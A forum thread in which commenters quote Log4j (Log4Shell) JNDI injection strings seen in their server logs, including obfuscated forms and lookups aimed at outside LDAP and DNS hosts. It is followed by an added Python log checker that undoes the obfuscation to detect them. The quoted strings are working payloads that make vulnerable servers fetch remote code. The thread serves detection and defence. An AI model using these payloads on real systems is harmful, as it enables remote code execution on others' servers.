shushpanchik | 4 years ago
As I understood, your policy blocks LDAP port (389). All of the scanning I see in logs at the moment uses port 80: "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
iso1631 | 4 years ago
Last ones I've seen:
jndi:dns://ip.address.scanworld.net/ref
jndi:ldap://162.55.90.26/222xxxx905/C
jndi:ldap://195.54.160.149:12344/Basic/Command/Base64...
jndi:ldap://45.130.229.168:1389/Exploit
{${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64....
Surprisingly very few attempts via http calls, and while some are on default ports, most aren't.
I think most obvious attack methods will have been closed. It's the routes like "naming a rogue AP" method that will be interesting.
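Added example, not written by either commenter: a Python log check that undoes the `${lower:…}`, `${upper:…}` and `${::-…}` nesting quoted in the comments above before looking for a JNDI reference, so detection does not depend on the literal string `jndi:ldap` or on a particular port. The function names and the sample log lines are constructed for illustration, and treating `${key:-default}` as always yielding the default is a simplifying assumption.

```python
import re

# Innermost ${...} with no further nesting inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI reference once obfuscation is gone: scheme, host, optional port.
_JNDI = re.compile(r"jndi:(\w+)://([^/:}\s]+)(?::(\d+))?", re.IGNORECASE)

def _resolve(match):
    body = match.group(1)
    prefix, _, value = body.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return value.lower()
    if prefix == "upper":
        return value.upper()
    # ${key:-default}: assume the key is unset, so ${::-j} yields "j".
    if prefix != "jndi" and ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)  # leave anything else (including jndi) untouched

def normalize(text):
    """Resolve nested lookups inside-out until the string stops changing."""
    while True:
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved

def find_jndi(line):
    """Return (scheme, host, port) for each JNDI reference; port may be None."""
    return [(s.lower(), h, int(p) if p else None)
            for s, h, p in _JNDI.findall(normalize(line))]

# Constructed log lines; hosts and addresses are documentation placeholders.
SAMPLES = [
    'GET / "${jndi:${lower:l}${lower:d}a${lower:p}://scan.example.invalid:80/callback}"',
    'GET / "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:12344/a}"',
    'GET / "${jndi:dns://probe.example.invalid/ref}"',
    'GET /index.html "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(find_jndi(line) or "clean", "<-", line)
```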